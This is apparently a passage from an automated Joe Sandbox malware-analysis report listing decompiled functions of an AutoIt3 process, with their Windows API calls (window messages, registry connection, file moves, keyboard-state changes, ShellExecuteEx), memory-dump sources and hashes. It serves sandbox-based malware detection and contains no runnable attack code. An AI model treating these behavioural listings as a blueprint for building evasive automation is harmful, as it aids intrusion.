                                      • GetSystemMetrics.USER32(0000000F), ref: 0088DB62
                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0088DD9D
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0088DDBB
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0088DDDC
                                      • ShowWindow.USER32(00000003,00000000), ref: 0088DDFB
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0088DE20
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0088DE43
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                      • String ID:
                                      • API String ID: 1211466189-0
                                      • Opcode ID: 956744e9ca34f22c4eac24539fc73b5c8c114d8f4689c4f8209220ce069e80ca
                                      • Instruction ID: 7480ab248bf70d8afbc6245b2ff2f7f1b7d3767aab5da71e29a7946a246cf173
                                      • Opcode Fuzzy Hash: 956744e9ca34f22c4eac24539fc73b5c8c114d8f4689c4f8209220ce069e80ca
                                      • Instruction Fuzzy Hash: 78B17831600219EFDF14EF69C985BAD7BB2FF04711F08806AED48EE295D775A950CBA0
                                      Function 00880371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0088147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0088044E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharConnectRegistryUpper_memmove
                                      • String ID:
                                      • API String ID: 3479070676-0
                                      • Opcode ID: 6d2ace875fb7f4c2586e688847f20ed744df9308ce334b19905e7063b0b1cc1c
                                      • Instruction ID: 6b786ec0433abd62ead262b1ad4581561a67f80248d5d9286d34fddc7b55d295
                                      • Opcode Fuzzy Hash: 6d2ace875fb7f4c2586e688847f20ed744df9308ce334b19905e7063b0b1cc1c
                                      • Instruction Fuzzy Hash: 96A146702042059FCB50EF68C885B6AB7E5FF84314F14891DF9969B2A2DB31E949CF46
                                      Function 00802E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00000000,?,00000000,00000000,?,0083C508,00000004,00000000,00000000,00000000), ref: 00802E9F
                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,?,0083C508,00000004,00000000,00000000,00000000,000000FF), ref: 00802EE7
                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,?,0083C508,00000004,00000000,00000000,00000000), ref: 0083C55B
                                      • ShowWindow.USER32(00000000,?,00000000,00000000,?,0083C508,00000004,00000000,00000000,00000000), ref: 0083C5C7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: fd142fe356b9600e661d3eaf7af5f129659b2575478d41387f2f6552543cde81
                                      • Instruction ID: 654f84965a2ec0e76870d4af7ee7f2d327e576511df6d6532f7448406bbfc431
                                      • Opcode Fuzzy Hash: fd142fe356b9600e661d3eaf7af5f129659b2575478d41387f2f6552543cde81
                                      • Instruction Fuzzy Hash: CD41D931644684AECBB6AB28CC8CB6B7B92FBD5314F28441EE447D65E2C7F1B840DB51
                                      Function 00867681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00867698
                                        • Part of subcall function 00820FE6: std::exception::exception.LIBCMT ref: 0082101C
                                        • Part of subcall function 00820FE6: __CxxThrowException@8.LIBCMT ref: 00821031
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008676CF
                                      • EnterCriticalSection.KERNEL32(?), ref: 008676EB
                                      • _memmove.LIBCMT ref: 00867739
                                      • _memmove.LIBCMT ref: 00867756
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00867765
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0086777A
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00867799
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 256516436-0
                                      • Opcode ID: 4fecaa903fc3b1d15a34762ab6c8d8f2f0d16680f7c55cc8879e55f591a28d15
                                      • Instruction ID: 3b62cebb4fea7ec55274ff2d69b939d7da7056911e437c05a8794244e5f2c320
                                      • Opcode Fuzzy Hash: 4fecaa903fc3b1d15a34762ab6c8d8f2f0d16680f7c55cc8879e55f591a28d15
                                      • Instruction Fuzzy Hash: 7D317271904119EFDF10EF98DC85E6EB778FF45300B2940A6F904EA256DB309A54DBA1
                                      Function 008867F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00886810
                                      • GetDC.USER32(00000000), ref: 00886818
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00886823
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0088682F
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0088686B
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0088687C
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0088964F,?,?,000000FF,00000000,?,000000FF,?), ref: 008868B6
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008868D6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: 47d98fccb1e8fb81eb739f5ff0bb5224057ce92a2c600a60c995fd9c45297dee
                                      • Instruction ID: 1b08ee604d3cfb19a1823a967477d7e97b1f02df83efe546cabe902f45d59ef4
                                      • Opcode Fuzzy Hash: 47d98fccb1e8fb81eb739f5ff0bb5224057ce92a2c600a60c995fd9c45297dee
                                      • Instruction Fuzzy Hash: 17316D721012147FEB11AF54CC8AFAA3FA9FF49761F084065FE08DA291D7759851CB70
                                      Function 0085C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 86460b838df5c31f148537d5aa2b22074f68d66775c8831ef33062ddfd6a1c38
                                      • Instruction ID: 2134e1a763bdf3c9eb6c71a4f9310eb3ae42540e319ea99576f7f1c4b0cfc013
                                      • Opcode Fuzzy Hash: 86460b838df5c31f148537d5aa2b22074f68d66775c8831ef33062ddfd6a1c38
                                      • Instruction Fuzzy Hash: F321D3A67017197E9A0075289D46FAF376CFE3874AB180020FD02F6B42E714DF59CEA2
                                      Function 0086F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                        • Part of subcall function 0081436A: _wcscpy.LIBCMT ref: 0081438D
                                      • _wcstok.LIBCMT ref: 0086F2D7
                                      • _wcscpy.LIBCMT ref: 0086F366
                                      • _memset.LIBCMT ref: 0086F399
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                      • String ID: X
                                      • API String ID: 774024439-3081909835
                                      • Opcode ID: 614bdfbbbc75d24c4b85cfa171767f58342404a81a89c9ea502af8026b1f5183
                                      • Instruction ID: 8c1c52a81cef0052c592b98663fcae595c2a51234d8fcc1653e80bccc4678b2f
                                      • Opcode Fuzzy Hash: 614bdfbbbc75d24c4b85cfa171767f58342404a81a89c9ea502af8026b1f5183
                                      • Instruction Fuzzy Hash: 4DC159716047419FC724EF68D845A9AB7E4FF84350F01492DFA99CB2A2DB30ED45CB92
                                      Function 00801800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c295ba79bf877099ea4b0e0e2dbce36dd73e708fe7237b615d7f9797f1c547aa
                                      • Instruction ID: a3231322fbcc7743d4576c64d80989f08e3422d225cc8dfe831e0e7892943ebd
                                      • Opcode Fuzzy Hash: c295ba79bf877099ea4b0e0e2dbce36dd73e708fe7237b615d7f9797f1c547aa
                                      • Instruction Fuzzy Hash: 83715970900509EFDF45DF98CC89ABEBB79FF86324F148159F915AA291C730AA51CFA0
                                      Function 00877261 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a8ea8ed6ced1c2761881a5ab345d5defc3b0ccad3b03f7bf48833e0ff51367d
                                      • Instruction ID: 14fceda62af16d0f63eab4cfe0dc61799ac39b3c580a4555b4c10322475b8748
                                      • Opcode Fuzzy Hash: 0a8ea8ed6ced1c2761881a5ab345d5defc3b0ccad3b03f7bf48833e0ff51367d
                                      • Instruction Fuzzy Hash: FE61A071208200ABC710EB28DC86E6FB7E8FF94714F148919F65AD72A2DB70DD45CB96
                                      Function 0088B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindow.USER32(00EA5FF8), ref: 0088BA5D
                                      • IsWindowEnabled.USER32(00EA5FF8), ref: 0088BA69
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0088BB4D
                                      • SendMessageW.USER32(00EA5FF8,000000B0,?,?), ref: 0088BB84
                                      • IsDlgButtonChecked.USER32(?,?), ref: 0088BBC1
                                      • GetWindowLongW.USER32(00EA5FF8,000000EC), ref: 0088BBE3
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0088BBFB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                      • String ID:
                                      • API String ID: 4072528602-0
                                      • Opcode ID: c6526e3aaf5a788d594542999eacba87946fed150c47f5c67ce72ad2db5baff8
                                      • Instruction ID: 76e5d4129f7684d67aa3bcfac060d4be00fa57fd42db73e64cf3274ab6677d2b
                                      • Opcode Fuzzy Hash: c6526e3aaf5a788d594542999eacba87946fed150c47f5c67ce72ad2db5baff8
                                      • Instruction Fuzzy Hash: 6371DD34605214AFDB29EF94C894FBABBB9FF89310F044069EA55D72A1CB31AC50DF60
                                      Function 0087FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0087FB31
                                      • _memset.LIBCMT ref: 0087FBFA
                                      • ShellExecuteExW.SHELL32(?), ref: 0087FC3F
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                        • Part of subcall function 0081436A: _wcscpy.LIBCMT ref: 0081438D
                                      • GetProcessId.KERNEL32(00000000), ref: 0087FCB6
                                      • CloseHandle.KERNEL32(00000000), ref: 0087FCE5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                      • String ID: @
                                      • API String ID: 3522835683-2766056989
                                      • Opcode ID: 2572d3c58396e4d412994c04e2f742b0d2d5c9965307a42c155aabacff3046ac
                                      • Instruction ID: 3e321d69b19900f3fbcb08c86384062740a53768e6e73941076529b63b11b433
                                      • Opcode Fuzzy Hash: 2572d3c58396e4d412994c04e2f742b0d2d5c9965307a42c155aabacff3046ac
                                      • Instruction Fuzzy Hash: CC61BEB5A00619DFCB11EF69C8919AEB7F4FF48310B148469E95AEB391CB30AD41CF91
                                      Function 0086174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 0086178B
                                      • GetKeyboardState.USER32(?), ref: 008617A0
                                      • SetKeyboardState.USER32(?), ref: 00861801
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0086182F
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0086184E
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00861894
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008618B7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: aadf9b5882574427eefb008e9289ede239f319d036492ecdcf7ce5b898e2dd6f
                                      • Instruction ID: f31e354d5bc99dd9686480173aefd5c4b53ed08654fbc4bfafdda9905042ada1
                                      • Opcode Fuzzy Hash: aadf9b5882574427eefb008e9289ede239f319d036492ecdcf7ce5b898e2dd6f
                                      • Instruction Fuzzy Hash: C651E460A087D53DFF364238CC59BBABEE9BB06304F0D8599E1D5D68C3C6989C84D751
                                      Function 00861565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(00000000), ref: 008615A4
                                      • GetKeyboardState.USER32(?), ref: 008615B9
                                      • SetKeyboardState.USER32(?), ref: 0086161A
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00861646
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00861663
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008616A7
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008616C8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 2deab0e3a50116cdf0ec8a2b967d296715c76bedeba48169c3331b7ad18d1890
                                      • Instruction ID: e83315d5672741b9a0571f0f10e1e41934c95757bcd569a0269897e4edd7aa0e
                                      • Opcode Fuzzy Hash: 2deab0e3a50116cdf0ec8a2b967d296715c76bedeba48169c3331b7ad18d1890
                                      • Instruction Fuzzy Hash: 8951E4A05047D53DFF328764CC49BBABEA9FB06300F0D8589E1D5C69C3D694AC98E751
                                      Function 00865BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$LocalTime
                                      • String ID:
                                      • API String ID: 2945705084-0
                                      • Opcode ID: c0c2b6d6e935092ace765cdab11f73566550e5ba4e805bd337ca36b2a36b8f91
                                      • Instruction ID: 83033b2954149a4131045fb333439a4b858b5019320b7a97db62002f3bda0387
                                      • Opcode Fuzzy Hash: c0c2b6d6e935092ace765cdab11f73566550e5ba4e805bd337ca36b2a36b8f91
                                      • Instruction Fuzzy Hash: 9A41C2A5C10628B5CB11FBB8DC469CFB3B9FF04310F119966F509E3161E638A355C3A6
                                      Function 00863B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00864BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863B8A,?), ref: 00864BE0
                                        • Part of subcall function 00864BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863B8A,?), ref: 00864BF9
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00863BAA
                                      • _wcscmp.LIBCMT ref: 00863BC6
                                      • MoveFileW.KERNEL32(?,?), ref: 00863BDE
                                      • _wcscat.LIBCMT ref: 00863C26
                                      • SHFileOperationW.SHELL32(?), ref: 00863C92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 1377345388-1173974218
                                      • Opcode ID: 9d677420fb28baeedc191de5346cdaffff9403acf0d5cb7d92b2d9e55916230b
                                      • Instruction ID: fd506214df896204544f13a23f02386e5a1be0e966423f1d0a239446a236312f
                                      • Opcode Fuzzy Hash: 9d677420fb28baeedc191de5346cdaffff9403acf0d5cb7d92b2d9e55916230b
                                      • Instruction Fuzzy Hash: 75415D71508344AAC752EB68D485ADFB7ECFF88390F51192EF489C3151EB34D6888752
                                      Function 008878B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 008878CF
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887976
                                      • IsMenu.USER32(?), ref: 0088798E
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008879D6
                                      • DrawMenuBar.USER32 ref: 008879E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                      • String ID: 0
                                      • API String ID: 3866635326-4108050209
